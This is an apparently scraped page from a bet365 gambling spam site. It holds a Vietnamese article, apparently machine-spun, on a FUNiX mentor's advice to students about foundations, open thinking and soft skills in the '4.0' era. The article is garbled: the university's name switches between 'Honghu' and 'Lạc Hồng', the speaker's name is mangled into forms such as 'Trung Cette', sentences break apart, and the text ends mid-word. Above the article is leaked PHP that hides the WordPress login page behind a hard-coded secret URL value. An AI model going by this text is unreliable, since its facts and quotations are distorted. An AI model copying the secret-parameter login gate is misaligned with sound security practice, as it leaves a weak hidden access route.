//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Ba yêu cầu cơ bản đối với sinh viên trong thời đại 4.0 | bet365 việt nam_địa chỉ liên kết bet365_cách vào bet365

Ba yêu cầu cơ bản đối với sinh viên trong thời đại 4.0

Khi gặp gỡ sinh viên Đại học Honghu (Đồng Nai) trong khuôn khổ khóa học xTour “Tuổi trẻ 4.0”, Đinh Vũ Quốc Trung, trợ giảng của giáo sư nội FPT Software cho biết: “Cuộc cách mạng công nghiệp lần thứ hai tạo ra điện vì con người có thể làm việc cả ngày lẫn đêm. Giúp nâng cao năng suất lao động Trong cuộc cách mạng công nghiệp lần thứ tư, robot sẽ thay thế con người và tiếp tục làm việc, ông cũng tin rằng những “nhà máy thông minh” sẽ trở thành sản phẩm tiêu biểu trong thời đại công nghệ ”-ông Đình Vũ Trung Quốc chia sẻ về Cách mạng Công nghiệp 4.0.

Theo ông Trung, 4.0 sẽ xóa bỏ ranh giới giữa thế giới thực và thế giới số. Xã hội đang thay đổi nhanh chóng và cơ hội không ngừng phát triển, nhưng thách thức mà giới trẻ phải đối mặt trong sự phát triển – lực lượng lao động trong tương lai sẽ duy trì tri thức như thế nào Để cập nhật, không phải cạnh tranh với robot.

Thực tế, thầy Đinh Vũ Quốc Trung chia sẻ một lưu ý, chỉ ra rằng học sinh cần chú ý … có kiến ​​thức tổng hợp và tư duy mở

Thầy Trung nghĩ, Trong thời đại mới, kiến ​​thức mà ai cũng cần không chỉ giới hạn ở trình độ chuyên môn mình đang học, trong tương lai các ngành nghề sẽ liên thông với nhau nên để tìm được việc làm thì ai cũng phải hiểu biết toàn diện và đòi hỏi chuyên môn đa dạng hơn. Kỹ năng.

Trong thời đại 4.0, kinh nghiệm của Trung Cette không còn là chìa khóa nữa. Săn việc thành công. Ngoài kinh nghiệm, nhà tuyển dụng còn quan tâm đến thái độ và mục tiêu nghề nghiệp của nhân viên.

“Tư duy cởi mở, sẵn sàng học hỏi, Hấp thụ những điều mới và đặt mục tiêu rõ ràng để hành động. Chuyên gia cho biết. “Đây là yếu tố thúc đẩy sự thành công trong tương lai của mọi người.” Một giáo viên trường Đại học Honghu (Đồng Nai) giao lưu với gia sư FUNIX trong xTour “Tuổi trẻ 4.0”.

Hiểu rõ nền tảng

Công nghệ được cập nhật và phát triển liên tục theo thời gian. Mentor Trung cho rằng đối với sinh viên năm nhất hoặc năm hai ngành khoa học máy tính, công nghệ mà họ đang học có thể trở nên lỗi thời khi họ ra trường.

Vì vậy, các môn học trọng tâm giống như cấu trúc logic, và nền tảng là kiến ​​thức học sinh cần học tốt.

“Sinh viên thường ngại học những môn này vì nó khô khan, nặng nề và vô bổ. Trưởng dự án của FPT Software cho biết, sau hai năm, công nghệ lạc hậu, không có nền tảng thì bạn sẽ không thể tự cập nhật kiến ​​thức .— -Phát triển kỹ năng mềm -Kỹ năng mềm ngày càng trở nên quan trọng đối với tất cả mọi người, đặc biệt là trong thời đại công nghệ, khi gặp gỡ sinh viên Đại học Lạc Hồng, Mentor Trung đã chia sẻ 10 kỹ năng quan trọng trong năm 2020. Anh Cho rằng sinh viên Việt Nam cần rèn luyện rất nhiều kỹ năng giải quyết vấn đề và tư duy phản biện. (Tư duy phản biện), kỹ năng sáng tạo và đàm phán.

Diễn đàn Kinh tế Thế giới đã công bố 10 kỹ năng thời đại mới.

Kết thúc buổi giao lưu, Giảng viên Tron nói với các sinh viên: “Đừng ngại hỏi. Đừng sợ bị hỏi nếu bạn hỏi không tốt, bạn hỏi những câu hỏi tồi. Nếu bạn không yêu cầu, bạn không thể làm những gì bạn muốn. Dù đang đi học hay đi làm, bạn đều phải cầu thành công. Chương trình trao đổi mentor FUNiX với sinh viên trường Đại học Lạc Hồng được thực hiện trong xTour “Tuổi trẻ 4.0” do Đại học trực tuyến FUNiX phối hợp với trường tổ chức.

Đây là chuyến đi xuyên Việt. Chia sẻ tác động của Công nghệ 4.0 và truyền cảm hứng cho giới trẻ hành động. Chương trình bắt đầu tại Cần T từ ngày 12/9, dự kiến ​​kết thúc hoạt động tập trung vào cuối tháng này, đến nay sẽ kết nối hơn 4.000 sinh viên đại học của 13 tỉnh thành từ nam ra bắc. -Chương

Leave a comment

bet365 việt nam_địa chỉ liên kết bet365_cách vào bet365